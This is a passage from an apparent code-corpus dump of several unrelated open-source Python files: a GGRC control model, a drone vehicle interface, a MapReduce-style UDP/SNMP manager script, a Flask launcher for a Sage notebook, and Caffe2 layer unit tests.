'secondary_assessor',
]
_sanitize_html = [
'documentation_description',
'version',
]
_include_links = []
_aliases = {
"url": "Control URL",
"kind": {
"display_name": "Kind/Nature",
"filter_by": "_filter_by_kind",
},
"means": {
"display_name": "Type/Means",
"filter_by": "_filter_by_means",
},
"verify_frequency": {
"display_name": "Frequency",
"filter_by": "_filter_by_verify_frequency",
},
"fraud_related": "Fraud Related",
"principal_assessor": {
"display_name": "Principal Assessor",
"filter_by": "_filter_by_principal_assessor",
},
"secondary_assessor": {
"display_name": "Secondary Assessor",
"filter_by": "_filter_by_secondary_assessor",
},
"key_control": {
"display_name": "Significance",
"description": "Allowed values are:\nkey\nnon-key\n---",
}
}
@validates('kind', 'means', 'verify_frequency')
def validate_control_options(self, key, option):
desired_role = key if key == 'verify_frequency' else 'control_' + key
return validate_option(self.__class__.__name__, key, option, desired_role)
@classmethod
def _filter_by_kind(cls, predicate):
return Option.query.filter(
(Option.id == cls.kind_id) & predicate(Option.title)
).exists()
@classmethod
def _filter_by_means(cls, predicate):
return Option.query.filter(
(Option.id == cls.means_id) & predicate(Option.title)
).exists()
@classmethod
def _filter_by_principal_assessor(cls, predicate):
return Person.query.filter(
(Person.id == cls.principal_assessor_id) &
(predicate(Person.name) | predicate(Person.email))
).exists()
@classmethod
def _filter_by_secondary_assessor(cls, predicate):
return Person.query.filter(
(Person.id == cls.secondary_assessor_id) &
(predicate(Person.name) | predicate(Person.email))
).exists()
@classmethod
def _filter_by_verify_frequency(cls, predicate):
return Option.query.filter(
(Option.id == cls.verify_frequency_id) & predicate(Option.title)
).exists()
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(Control, cls).eager_query()
return cls.eager_inclusions(query, Control._include_links).options(
orm.joinedload('directive'),
orm.joinedload('principal_assessor'),
orm.joinedload('secondary_assessor'),
)
def log_json(self):
out_json = super(Control, self).log_json()
# so that event log can refer to deleted directive
if self.directive:
out_json["mapped_directive"] = self.directive.display_name
return out_json
track_state_for_class(Control)
| edofic/ggrc-core | src/ggrc/models/control.py | Python | apache-2.0 | 8,365 |
# Core imports
import copy
# Library imports
from dronekit import VehicleMode, LocationLocal, LocationGlobal, LocationGlobalRelative
# Package imports
from ..core.Threadable import Threadable
from ..geometry.Geometry_Spherical import Geometry_Spherical
class Vehicle(Threadable):
"""
Vehicle interface specification.
"""
@classmethod
def create(cls, arguments, geometry, import_manager, thread_manager, usb_manager):
"""
Create a `Vehicle` object from one of the subclass types.
`arguments` is an `Arguments` object that Vehicle subclasses can use to
deduce settings from. `geometry` is a Geometry object of the space that
the vehicle operates in. `import_manager` is an `Import_Manager` for
deducing the location of the vehicle module. The `thread_manager` allows
any worker threads to be registered in the `Thread_Manager`. Finally,
the `usb_manager` argument is an instance of `USB_Manager` where certain
peripherals can be loaded, e.g. for communicating with an external motor
controller attached via a TTL device.
Returns an initialized object that is a subclass of `Vehicle`.
"""
settings = arguments.get_settings("vehicle")
vehicle_class_name = settings.get("vehicle_class")
vehicle_class = import_manager.load_class(vehicle_class_name,
relative_module="vehicle")
return vehicle_class(arguments, geometry, import_manager,
thread_manager, usb_manager)
def __init__(self, arguments, geometry, import_manager, thread_manager, usb_manager):
"""
Initialize the vehicle.
"""
super(Vehicle, self).__init__("vehicle", thread_manager)
self._geometry = geometry
self._home_location = None
self._mode = VehicleMode("PLACEHOLDER")
self._armed = False
self._servos = {}
self._attribute_listeners = {}
def setup(self):
"""
Set up preliminary backend requirements for the vehicle.
"""
pass
@property
def use_simulation(self):
"""
Check whether we want to use a simulated environment for this vehicle.
This can depend on settings or the Vehicle class itself.
"""
raise NotImplementedError("Subclasses must implement `use_simulation` property")
@property
def home_location(self):
"""
Retrieve the home location object.
This property returns a fresh `Location` object. The location type can
depend on the vehicle type and the vehicle's geometry.
"""
raise NotImplementedError("Subclasses must implement `home_location` property")
@home_location.setter
def home_location(self, position):
"""
Change the home location to another `Location` object.
The location `position` need not be a `LocationGlobal` object, but exact
handling of other types may depend on the vehicle type and the vehicle's
geometry.
An updated location also results in a notification to the attribute
listeners with a fresh `Location` object.
"""
self._home_location = copy.copy(position)
self.notify_attribute_listeners('home_location', self._home_location)
def set_home_state(self, position, yaw=0.0):
"""
Change the home location to another `Location` object `position` and
the expected yaw attitude to another `yaw`.
For vehicles that make use of a home attitude, either to know their
initial orientation compared to the geometry or to know how to orient
themselves upon returning to its home location, this method allows one
to keep track of both the home location and the yaw.
"""
self.home_location = position
@property
def mode(self):
"""
Get the vehicle mode.
The mode is returned as a `VehicleMode` object with a `name` property.
"""
return self._mode
@mode.setter
def mode(self, value):
"""
Set the vehicle mode.
The mode must be a `VehicleMode` object.
"""
self._mode = value
@property
def armed(self):
"""
Check whether the vehicle is armed.
An armed vehicle is ready to move around or is currently moving.
"""
return self._armed
@armed.setter
def armed(self, value):
"""
Arm or disarm the vehicle by setting a boolean `value` to its state.
"""
self._armed = value
def pause(self):
"""
Stop the vehicle such that it attempts to remain in place.
The vehicle should stop any actions fairly quickly upon a pause.
Mission objectives such as moving to waypoints are frozen, i.e., they
are not actively sought after. The vehicle may be unpaused by changing
its vehicle mode to a new mode. The vehicle may automatically disarm
itself during its paused state, but this should not endanger itself or
make it impossible to continue later on.
"""
raise NotImplementedError("Subclasses must implement `pause()`")
def update_mission(self):
"""
Propagate any updates to mission attributes, such as waypoints and
home location, to backend vehicle control, internal properties and
listeners.
This method can also print any information about mission attributes.
"""
pass
def add_takeoff(self, altitude):
"""
Add a command to take off to a certain `altitude` in the mission.
If the Vehicle backend does not support takeoff commands, this method
is a no-op and should return `False` to indicate no command was added
to the list of waypoints.
"""
return False
def add_waypoint(self, location):
"""
Add a waypoint to move to a specified `location` in the mission.
The waypoints added are supposed to be followed in order of the calls
to this method. The use of the waypoints depends of the vehicle mode.
The `location` is a Location object.
"""
raise NotImplementedError("Subclasses must implement `add_waypoint(location)`")
def add_wait(self):
"""
Add a command to wait after reaching a previous waypoint command.
The vehicle waits indefinitely after reaching this location, unless
the waypoint is manually adjusted using `set_next_waypoint`.
"""
raise NotImplementedError("Subclasses must implement `add_wait()`")
def clear_waypoints(self):
"""
Clear any waypoints and other mission commands to the vehicle.
"""
raise NotImplementedError("Subclasses must implement `clear_waypoints()`")
def is_wait(self):
"""
Check if the current waypoint is a wait command added via `add_wait`.
If the `Vehicle` does not support waypoints, or if the given `waypoint`
index number is incorrect, or the waypoint itself is invalid, e.g., it
was retrieved from a non-wait command, then the method must return
`False`.
"""
raise NotImplementedError("Subclasses must implement `is_wait()`")
def get_waypoint(self, waypoint=-1):
"""
Retrieve a waypoint from the list of vehicle waypoint commands.
The given `waypoint` is an index of the waypoint list.
If `waypoint` is `-1`, then return the waypoint that the vehicle should
reach "next" in the mission.
If the `Vehicle` does not support waypoints, or if the given `waypoint`
index number is incorrect, then this method must return `None`. If the
waypoint itself is invalid, e.g., it was retrieved from a non-waypoint
command, then the method may return `None` or some other value.
"""
raise NotImplementedError("Subclasses must implement `get_waypoint(waypoint)`")
def get_next_waypoint(self):
"""
Get the current waypoint number.
"""
raise NotImplementedError("Subclasses must implement `get_next_waypoint()`")
def set_next_waypoint(self, waypoint=-1):
"""
Set the current waypoint that we wish to reach.
The given `waypoint` is an index of the waypoint list.
If `waypoint` is `-1`, then set the waypoint index to the waypoint
after the current waypoint.
"""
raise NotImplementedError("Subclasses must implement `set_next_waypoint(waypoint)`")
def count_waypoints(self):
"""
Return the number of waypoints in the mission.
"""
raise NotImplementedError("Subclasses must implement `count_waypoints()`")
def check_arming(self):
"""
Perform final setup checks and make the vehicle ready to move.
This can wait for final backend instantiation, perform necessary checks
and finally arm the motors and put the vehicle in a controlled state.
"""
return True
def simple_takeoff(self, altitude):
"""
Take off to a certain relative altitude in meters.
If the Vehicle backend does not support taking off, this method
is a no-op and should return `False` to indicate that it is not taking
off. Otherwise, return `True` so that the caller can check whether it
reached the specified altitude.
"""
return False
def simple_goto(self, location):
"""
Set the target `location` of the vehicle to the given `Location` object.
"""
raise NotImplementedError("Subclasses must implement `simple_goto(location)`")
def is_location_valid(self, location):
"""
Check whether a given `location` is valid, i.e. it is populated with
a somewhat correct location. The default implementation checks whether
none of the fields is populated with `None`, which is what dronekit
does when it has no location information yet.
Returns a boolean indicating whether the `location` is useable.
If an invalid location type is given, then a `TypeError` is raised.
"""
if isinstance(location, LocationLocal):
# Only need to check one field
return location.north is not None
if isinstance(location, LocationGlobalRelative) or isinstance(location, LocationGlobal):
# Check for a coordinate field and altitude field as per dronekit.
return location.lat is not None and location.alt is not None
raise TypeError("Invalid type for location object")
def is_current_location_valid(self):
"""
Check whether the current vehicle location is valid.
"""
return self.is_location_valid(self.location)
@property
def location(self):
"""
Retrieve the current location of the vehicle.
This property returns the location as a `Locations` object with any
number of valid frames, or one of the `LocationLocal`,
`LocationGlobalRelative` or `LocationGlobal` objects.
"""
raise NotImplementedError("Subclasses must implement `location` property")
@property
def speed(self):
"""
Get the speed of the vehicle in m/s relative to its current attitude.
If the speed cannot be retrieved, raise a `NotImplementedError`.
"""
raise NotImplementedError("Subclass does not implement `speed` property")
@speed.setter
def speed(self, value):
"""
Set the speed of the vehicle in m/s relative to its current attitude.
If the speed cannot be set or if the current vehicle mode does not
support setting the speed in this way, ignore the value.
"""
pass
@property
def velocity(self):
"""
Get the velocity in m/s spread out over components of the current frame.
The frame will almost always be north, east and down (NED).
If the velocity cannot be retrieved, raise a `NotImplementedError`.
"""
raise NotImplementedError("Subclass does not implement `velocity` property")
@velocity.setter
def velocity(self, value):
"""
Set the velocity in m/s spread out over components of the current frame.
        If the velocity cannot be set or if the current vehicle mode does not
        support setting the velocity in this way, ignore the value.
"""
pass
@property
def attitude(self):
"""
Get the current attitude information of the vehicle.
This property is an Attitude object with `pitch`, `yaw` and `roll`
property fields which are bearings in radians.
If the attitude cannot be retrieved, raise a `NotImplementedError`.
"""
raise NotImplementedError("Subclass does not implement `attitude` property")
def set_yaw(self, heading, relative=False, direction=1):
"""
Set the bearing `heading` of the vehicle in degrees.
This becomes the yaw of the vehicle, the direction in which it is facing
relative to the surface plane.
The `heading` is a bearing, meaning that north is zero degrees/radians,
and the bearings increase counterclockwise.
If `relative` is false, `heading` is the number of degrees off from
northward direction, counterclockwise.
If `relative` is true, the `heading` is still given as a bearing,
but respective to the vehicle's current yaw.
The `direction` gives the direction in which we should rotate:
`1` means clockwise and `-1` is counterclockwise. Other values may be
supported by certain vehicles, and `-1` may be unsupported in certain
modes, such as absolute headings.
If the yaw cannot be changed, ignore the value.
"""
pass
def set_servo(self, servo, pwm):
"""
Set the PWM value of a given `servo` to the given `pwm`.
The `servo` is a `Servo` object with the correct pin number.
        The `pwm` must be within the Servo's PWM duty range.
If the vehicle does not support servos, raise a `NotImplementedError`.
"""
raise NotImplementedError("Subclass does not implement `set_servo(servo, pwm)`")
def add_attribute_listener(self, attribute, listener):
"""
Add a listener for when a certain vehicle attribute changes.
"""
if attribute not in self._attribute_listeners:
self._attribute_listeners[attribute] = []
if listener not in self._attribute_listeners:
self._attribute_listeners[attribute].append(listener)
def remove_attribute_listener(self, attribute, listener):
"""
Remove a listener for a certain vehicle attribute.
Raises a `KeyError` if the attribute has no listeners.
        Raises `ValueError` if the specific `listener` is not registered.
"""
listeners = self._attribute_listeners.get(attribute)
if listeners is None:
raise KeyError("Attribute '{}' has no listeners".format(attribute))
listeners.remove(listener)
if len(listeners) == 0:
del self._attribute_listeners[attribute]
def notify_attribute_listeners(self, attribute, value):
"""
Notify all listeners for a specific attribute.
"""
for fn in self._attribute_listeners.get(attribute, []):
fn(self, attribute, value)
def _set_servos(self, servo_pwms):
"""
Set updated PWM values of servos.
Vehicle subclasses must call this method with a dictionary with servo
pin numbers and current PWM values whenever they update servos that are
relevant to the listeners. For example, an update of motor servos may
be left out of updates in case the listeners have no need for them, but
any servos used for distance sensors should be in the dictionary.
"""
self._servos.update(servo_pwms)
self.notify_attribute_listeners('servos', self._servos)
def _make_global_location(self, value):
"""
Convert a `Location` object to a global location.
"""
if isinstance(value, LocationGlobal):
value = LocationGlobal(value.lat, value.lon, value.alt)
elif isinstance(value, LocationLocal):
home_location = self._home_location
if home_location is None:
value = LocationGlobal(value.north, value.east, -value.down)
elif isinstance(self._geometry, Geometry_Spherical):
value = self._geometry.get_location_meters(home_location,
value.north,
value.east,
-value.down)
else:
value = LocationGlobal(home_location.lat + value.north,
home_location.lon + value.east,
home_location.alt - value.down)
elif isinstance(value, LocationGlobalRelative):
home_location = self._home_location
if home_location is not None:
alt = home_location.alt
else:
alt = 0.0
value = LocationGlobal(value.lat, value.lon, alt + value.alt)
return value
| timvandermeij/unmanned-vehicle-tomography | vehicle/Vehicle.py | Python | gpl-3.0 | 17,679 |
from twisted.internet.task import react
from pysnmp.hlapi.twisted import *
import socket
mapper_1 = "10.0.0.1"
mapper_2 = "10.0.0.2"
reducer = "10.0.0.3"
manager = "10.0.0.4"
def file_processing():
file_in = open("test.txt","r")
num_lines = sum(1 for line in file_in)
file_in.close()
file_in = open("test.txt","r")
print num_lines
file1 = ""
file2 = ""
count = 0
for line in file_in:
if count < num_lines/2:
file1+=(line + "\n")
count = count + 1
else:
file2+=(line + "\n")
count += 1
file_in.close()
return file1, file2
def send_file(file1, file2):
port = 1162
sock = socket.socket(socket.AF_INET,
socket.SOCK_DGRAM)
len1 = len(file1)
len2 = len(file2)
print len1, len2
buf = 4096
start = 0
while ((start + buf) < len1):
sock.sendto(file1[start:start+buf],(mapper_1, port))
start = start + buf
print start, buf, len1
print (start + buf)<len1
sock.sendto(file1[start:],(mapper_1, port))
start = 0
while ((start + buf) < len2):
sock.sendto(file2[start:start+buf],(mapper_2, port))
start = start + buf
sock.sendto(file2[start:],(mapper_2, port))
sock.close()
def success((errorStatus, errorIndex, varBinds), hostname):
if errorStatus:
print('%s: %s at %s' % (
hostname,
errorStatus.prettyPrint(),
errorIndex and varBinds[int(errorIndex)-1][0] or '?'
)
)
else:
for varBind in varBinds:
print(' = '.join([ x.prettyPrint() for x in varBind ]))
def failure(errorIndication, hostname):
print('%s failure: %s' % (hostname, errorIndication))
def getSysDescr(reactor, hostname):
d = getCmd(SnmpEngine(),
CommunityData('public', mpModel=0),
               UdpTransportTarget((hostname, 1161)),
ContextData(),
ObjectType(ObjectIdentity('1.3.6.1.2.1.1.1.0')))
#ObjectType(ObjectIdentity('1.3.6.1.2.1.1.3.0')))
d.addCallback(success, hostname).addErrback(failure, hostname)
return d
file1, file2 = file_processing()
send_file(file1, file2)
react(getSysDescr, ['10.0.0.1'])
| hylandnp/CS7012_DISTRIBUTED_PROJECT | manager.py | Python | mit | 2,200 |
from backend import db
from . import models
class UserTypeSerializer:
def serialize(self, user_types):
        data = []
        for user_type in user_types:
            data.append({
                'id': user_type.id,
                'name': user_type.name,
            })
        return data
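# Hedged usage sketch (UserType is assumed to live in the sibling models module):
#   payload = UserTypeSerializer().serialize(models.UserType.query.all())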
| sandroandrade/emile-server | cruds/crud_user_type/serializer.py | Python | gpl-3.0 | 294 |
from abc import ABCMeta, abstractmethod
class Generator(object):
__metaclass__ = ABCMeta
@abstractmethod
def generate(self, system, rom, playersControllers, gameResolution):
pass
def getResolution(self, config):
return config['videomode']
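# Hedged example of a concrete generator (class and command are illustrative):
# class DummyGenerator(Generator):
#     def generate(self, system, rom, playersControllers, gameResolution):
#         return 'retroarch "%s"' % rom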
| nadenislamarre/recalbox-configgen | configgen/generators/Generator.py | Python | mit | 275 |
#We don't use sagenb.notebook.run_notebook because we want the server in the same python environment as our app so we have access to the Notebook and Worksheet objects.
#########
# Flask #
#########
import os, random
from guru.globals import GURU_PORT, GURU_NOTEBOOK_DIR
import sagenb.notebook.notebook as notebook
from sagenb.misc.misc import find_next_available_port
import flask_server.base as flask_base
def startServer(notebook_to_use=None, open_browser=False, debug_mode=False):
    #notebook_directory = os.path.join(DOT_SAGENB, "sage_notebook.sagenb")
    #Setup the notebook.
    if notebook_to_use is None:
        #We assume the notebook is empty. The original referenced
        #notebook_directory before it was assigned (a NameError on this
        #path); GURU_NOTEBOOK_DIR -- imported above and otherwise unused --
        #is the plausible intended default, so it is used here.
        notebook_directory = GURU_NOTEBOOK_DIR
        notebook_to_use = notebook.load_notebook(notebook_directory)
        notebook_to_use.user_manager().add_user('admin', 'admin', 'rljacobson@gmail.com', force=True)
        notebook_to_use.save() #Write out changes to disk.
    notebook_directory = notebook_to_use._dir
#Setup the flask app.
opts={}
opts['startup_token'] = '{0:x}'.format(random.randint(0, 2**128))
startup_token = opts['startup_token']
flask_base.notebook = notebook_to_use
#create_app will now use notebook_to_use instead of the provided location.
    flask_app = flask_base.create_app(interface="localhost", port=8081, secure=False, **opts)
sagenb_pid = os.path.join(notebook_directory, "sagenb.pid")
with open(sagenb_pid, 'w') as pidfile:
pidfile.write(str(os.getpid()))
    #Quiet werkzeug's logger: only warnings and above go to stderr.
    import logging
    logger = logging.getLogger('werkzeug')
    logger.setLevel(logging.WARNING)
#logger.setLevel(logging.INFO) # to see page requests
#logger.setLevel(logging.DEBUG)
logger.addHandler(logging.StreamHandler())
port = find_next_available_port('localhost', GURU_PORT)
notebook_to_use.port = port
#MAKE THIS HAPPEN IN flask_base: g.username = session['username'] = 'admin'
if open_browser:
from sagenb.misc.misc import open_page
open_page('localhost', port, False, '/?startup_token=%s' % startup_token)
try:
if debug_mode:
flask_app.run(host='localhost', port=port, threaded=True,
ssl_context=None, debug=True, use_reloader=False)
else:
flask_app.run(host='localhost', port=port, threaded=True,
ssl_context=None, debug=False)
finally:
#save_notebook(flask_base.notebook)
os.unlink(sagenb_pid)
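# Hedged usage sketch (assumes the caller prepared a sagenb Notebook
# object; `my_notebook` is illustrative):
#
#     from guru.RunFlask import startServer
#     startServer(notebook_to_use=my_notebook, open_browser=True)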
| rljacobson/Guru | guru/RunFlask.py | Python | mit | 2,460 |
# Copyright (c) 2016-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import hypothesis.strategies as st
import numpy as np
import numpy.testing as npt
from hypothesis import given
import caffe2.python.hypothesis_test_util as hu
from caffe2.python import (
layer_model_instantiator,
core,
schema,
workspace,
)
from caffe2.python.layers.layers import (
InstantiationContext,
)
from caffe2.python.layers.tags import Tags
from caffe2.python.layer_test_util import (
LayersTestCase,
OpSpec,
)
from caffe2.python.layers.layers import (
IdList,
set_request_only,
is_request_only_scalar,
)
class TestLayers(LayersTestCase):
def testAddLoss(self):
input_record_LR = self.new_record(
schema.Struct(
('label', schema.Scalar((np.float64, (1, )))),
('prediction', schema.Scalar((np.float32, (2, )))),
('weight', schema.Scalar((np.float64, (1, ))))
)
)
loss_LR = self.model.BatchLRLoss(input_record_LR)
self.model.add_loss(loss_LR)
assert 'unnamed' in self.model.loss
self.assertEqual(
schema.Scalar((np.float32, tuple())), self.model.loss.unnamed
)
self.assertEqual(loss_LR, self.model.loss.unnamed)
self.model.add_loss(loss_LR, 'addLoss')
assert 'addLoss' in self.model.loss
self.assertEqual(
schema.Scalar((np.float32, tuple())), self.model.loss.addLoss
)
self.assertEqual(loss_LR, self.model.loss.addLoss)
self.model.add_loss(
schema.Scalar(
dtype=np.float32, blob=core.BlobReference('loss_blob_1')
), 'addLoss'
)
assert 'addLoss_auto_0' in self.model.loss
self.assertEqual(
schema.Scalar((np.float32, tuple())), self.model.loss.addLoss_auto_0
)
assert core.BlobReference('loss_blob_1') in self.model.loss.field_blobs()
self.model.add_loss(
schema.Struct(
(
'structName', schema.Scalar(
dtype=np.float32,
blob=core.BlobReference('loss_blob_2')
)
)
), 'addLoss'
)
assert 'addLoss_auto_1' in self.model.loss
self.assertEqual(
schema.Struct(('structName', schema.Scalar((np.float32, tuple())))),
self.model.loss.addLoss_auto_1
)
assert core.BlobReference('loss_blob_2') in self.model.loss.field_blobs()
loss_in_tuple_0 = schema.Scalar(
dtype=np.float32, blob=core.BlobReference('loss_blob_in_tuple_0')
)
loss_in_tuple_1 = schema.Scalar(
dtype=np.float32, blob=core.BlobReference('loss_blob_in_tuple_1')
)
loss_tuple = schema.NamedTuple(
'loss_in_tuple', * [loss_in_tuple_0, loss_in_tuple_1]
)
self.model.add_loss(loss_tuple, 'addLoss')
assert 'addLoss_auto_2' in self.model.loss
self.assertEqual(
schema.Struct(
('loss_in_tuple_0', schema.Scalar((np.float32, tuple()))),
('loss_in_tuple_1', schema.Scalar((np.float32, tuple())))
), self.model.loss.addLoss_auto_2
)
assert core.BlobReference('loss_blob_in_tuple_0')\
in self.model.loss.field_blobs()
assert core.BlobReference('loss_blob_in_tuple_1')\
in self.model.loss.field_blobs()
def _test_net(self, net, ops_list):
"""
Helper function to assert the net contains some set of operations and
then to run the net.
Inputs:
net -- the network to test and run
ops_list -- the list of operation specifications to check for
in the net
"""
ops_output = self.assertNetContainOps(net, ops_list)
workspace.RunNetOnce(net)
return ops_output
def testFCWithoutBias(self):
output_dims = 2
fc_without_bias = self.model.FCWithoutBias(
self.model.input_feature_schema.float_features, output_dims)
self.model.output_schema = fc_without_bias
self.assertEqual(
schema.Scalar((np.float32, (output_dims, ))),
fc_without_bias
)
train_init_net, train_net = self.get_training_nets()
init_ops = self.assertNetContainOps(
train_init_net,
[
OpSpec("UniformFill", None, None),
]
)
mat_mul_spec = OpSpec(
"MatMul",
[
self.model.input_feature_schema.float_features(),
init_ops[0].output[0],
],
fc_without_bias.field_blobs()
)
self.assertNetContainOps(train_net, [mat_mul_spec])
predict_net = self.get_predict_net()
self.assertNetContainOps(predict_net, [mat_mul_spec])
def testSamplingTrain(self):
output_dims = 1000
indices = self.new_record(schema.Scalar((np.int32, (10,))))
sampling_prob = self.new_record(schema.Scalar((np.float32, (10, ))))
sampled_fc = self.model.SamplingTrain(
schema.Struct(
('input', self.model.input_feature_schema.float_features),
('indices', indices),
('sampling_prob', sampling_prob),
),
"FC",
output_dims,
)
self.model.output_schema = sampled_fc
# Check that we don't add prediction layer into the model
self.assertEqual(1, len(self.model.layers))
self.assertEqual(
schema.Scalar((np.float32, (output_dims, ))),
sampled_fc
)
train_init_net, train_net = self.get_training_nets()
init_ops = self.assertNetContainOps(
train_init_net,
[
OpSpec("UniformFill", None, None),
OpSpec("UniformFill", None, None),
]
)
sampled_fc_layer = self.model.layers[0]
gather_w_spec = OpSpec(
"Gather",
[
init_ops[0].output[0],
indices(),
],
[
sampled_fc_layer._prediction_layer.train_param_blobs[0]
]
)
gather_b_spec = OpSpec(
"Gather",
[
init_ops[1].output[0],
indices(),
],
[
sampled_fc_layer._prediction_layer.train_param_blobs[1]
]
)
train_fc_spec = OpSpec(
"FC",
[
self.model.input_feature_schema.float_features(),
] + sampled_fc_layer._prediction_layer.train_param_blobs,
sampled_fc.field_blobs()
)
log_spec = OpSpec("Log", [sampling_prob()], [None])
sub_spec = OpSpec(
"Sub",
[sampled_fc.field_blobs()[0], None],
sampled_fc.field_blobs()
)
train_ops = self.assertNetContainOps(
train_net,
[gather_w_spec, gather_b_spec, train_fc_spec, log_spec, sub_spec])
self.assertEqual(train_ops[3].output[0], train_ops[4].input[1])
predict_net = self.get_predict_net()
self.assertNetContainOps(
predict_net,
[
OpSpec(
"FC",
[
self.model.input_feature_schema.float_features(),
init_ops[0].output[0],
init_ops[1].output[0],
],
sampled_fc.field_blobs()
)
]
)
def testBatchLRLoss(self):
input_record = self.new_record(schema.Struct(
('label', schema.Scalar((np.float64, (1,)))),
('prediction', schema.Scalar((np.float32, (2,)))),
('weight', schema.Scalar((np.float64, (1,))))
))
loss = self.model.BatchLRLoss(input_record)
self.assertEqual(schema.Scalar((np.float32, tuple())), loss)
def testMarginRankLoss(self):
input_record = self.new_record(schema.Struct(
('pos_prediction', schema.Scalar((np.float32, (1,)))),
('neg_prediction', schema.List(np.float32)),
))
pos_items = np.array([0.1, 0.2, 0.3], dtype=np.float32)
neg_lengths = np.array([1, 2, 3], dtype=np.int32)
neg_items = np.array([0.1, 0.2, 0.3, 0.4, 0.5, 0.6], dtype=np.float32)
schema.FeedRecord(
input_record,
[pos_items, neg_lengths, neg_items]
)
loss = self.model.MarginRankLoss(input_record)
self.run_train_net_forward_only()
self.assertEqual(schema.Scalar((np.float32, tuple())), loss)
def testBatchMSELoss(self):
input_record = self.new_record(schema.Struct(
('label', schema.Scalar((np.float64, (1,)))),
('prediction', schema.Scalar((np.float32, (2,)))),
))
loss = self.model.BatchMSELoss(input_record)
self.assertEqual(schema.Scalar((np.float32, tuple())), loss)
def testBatchSigmoidCrossEntropyLoss(self):
input_record = self.new_record(schema.Struct(
('label', schema.Scalar((np.float32, (32,)))),
('prediction', schema.Scalar((np.float32, (32,))))
))
loss = self.model.BatchSigmoidCrossEntropyLoss(input_record)
self.assertEqual(schema.Scalar((np.float32, tuple())), loss)
def testBatchSoftmaxLoss(self):
input_record = self.new_record(schema.Struct(
('label', schema.Scalar((np.float32, tuple()))),
('prediction', schema.Scalar((np.float32, (32,))))
))
loss = self.model.BatchSoftmaxLoss(input_record)
self.assertEqual(schema.Struct(
('softmax', schema.Scalar((np.float32, (32,)))),
('loss', schema.Scalar(np.float32)),
), loss)
def testBatchSoftmaxLossWeight(self):
input_record = self.new_record(schema.Struct(
('label', schema.Scalar((np.float32, tuple()))),
('prediction', schema.Scalar((np.float32, (32,)))),
('weight', schema.Scalar((np.float64, (1,))))
))
loss = self.model.BatchSoftmaxLoss(input_record)
self.assertEqual(schema.Struct(
('softmax', schema.Scalar((np.float32, (32,)))),
('loss', schema.Scalar(np.float32)),
), loss)
@given(
X=hu.arrays(dims=[2, 5]),
)
def testBatchNormalization(self, X):
input_record = self.new_record(schema.Scalar((np.float32, (5,))))
schema.FeedRecord(input_record, [X])
bn_output = self.model.BatchNormalization(input_record)
self.assertEqual(schema.Scalar((np.float32, (5,))), bn_output)
self.model.output_schema = schema.Struct()
train_init_net, train_net = self.get_training_nets()
init_ops = self.assertNetContainOps(
train_init_net,
[
OpSpec("ConstantFill", None, None),
OpSpec("ConstantFill", None, None),
OpSpec("ConstantFill", None, None),
OpSpec("ConstantFill", None, None),
]
)
input_blob = input_record.field_blobs()[0]
output_blob = bn_output.field_blobs()[0]
expand_dims_spec = OpSpec(
"ExpandDims",
[input_blob],
None,
)
train_bn_spec = OpSpec(
"SpatialBN",
[None, init_ops[0].output[0], init_ops[1].output[0],
init_ops[2].output[0], init_ops[3].output[0]],
[output_blob, init_ops[2].output[0], init_ops[3].output[0], None, None],
{'is_test': 0, 'order': 'NCHW', 'momentum': 0.9},
)
test_bn_spec = OpSpec(
"SpatialBN",
[None, init_ops[0].output[0], init_ops[1].output[0],
init_ops[2].output[0], init_ops[3].output[0]],
[output_blob],
{'is_test': 1, 'order': 'NCHW', 'momentum': 0.9},
)
squeeze_spec = OpSpec(
"Squeeze",
[output_blob],
[output_blob],
)
self.assertNetContainOps(
train_net,
[expand_dims_spec, train_bn_spec, squeeze_spec]
)
eval_net = self.get_eval_net()
self.assertNetContainOps(
eval_net,
[expand_dims_spec, test_bn_spec, squeeze_spec]
)
predict_net = self.get_predict_net()
self.assertNetContainOps(
predict_net,
[expand_dims_spec, test_bn_spec, squeeze_spec]
)
workspace.RunNetOnce(train_init_net)
workspace.RunNetOnce(train_net)
schema.FeedRecord(input_record, [X])
workspace.RunNetOnce(eval_net)
schema.FeedRecord(input_record, [X])
workspace.RunNetOnce(predict_net)
@given(
X=hu.arrays(dims=[5, 2]),
num_to_collect=st.integers(min_value=1, max_value=10),
)
def testLastNWindowCollector(self, X, num_to_collect):
input_record = self.new_record(schema.Scalar(np.float32))
schema.FeedRecord(input_record, [X])
last_n = self.model.LastNWindowCollector(input_record, num_to_collect)
self.run_train_net_forward_only()
output_record = schema.FetchRecord(last_n.last_n)
start = max(0, 5 - num_to_collect)
npt.assert_array_equal(X[start:], output_record())
num_visited = schema.FetchRecord(last_n.num_visited)
npt.assert_array_equal([5], num_visited())
def testUniformSampling(self):
input_record = self.new_record(schema.Scalar(np.int32))
input_array = np.array([3, 10, 11, 15, 20, 99], dtype=np.int32)
schema.FeedRecord(input_record, [input_array])
num_samples = 20
num_elements = 100
uniform_sampling_output = self.model.UniformSampling(
input_record, num_samples, num_elements)
self.model.loss = uniform_sampling_output
self.run_train_net()
samples = workspace.FetchBlob(uniform_sampling_output.samples())
sampling_prob = workspace.FetchBlob(
uniform_sampling_output.sampling_prob())
self.assertEqual(num_samples, len(samples))
np.testing.assert_array_equal(input_array, samples[:len(input_array)])
np.testing.assert_almost_equal(
np.array([float(num_samples) / num_elements] * num_samples,
dtype=np.float32),
sampling_prob
)
def testUniformSamplingWithIncorrectSampleSize(self):
input_record = self.new_record(schema.Scalar(np.int32))
num_samples = 200
num_elements = 100
with self.assertRaises(AssertionError):
self.model.UniformSampling(input_record, num_samples, num_elements)
def testGatherRecord(self):
indices = np.array([1, 3, 4], dtype=np.int32)
dense = np.array(list(range(20)), dtype=np.float32).reshape(10, 2)
lengths = np.array(list(range(10)), dtype=np.int32)
items = np.array(list(range(lengths.sum())), dtype=np.int64)
items_lengths = np.array(list(range(lengths.sum())), dtype=np.int32)
items_items = np.array(list(range(items_lengths.sum())), dtype=np.int64)
record = self.new_record(schema.Struct(
('dense', schema.Scalar(np.float32)),
('sparse', schema.Struct(
('list', schema.List(np.int64)),
('list_of_list', schema.List(schema.List(np.int64))),
)),
('empty_struct', schema.Struct())
))
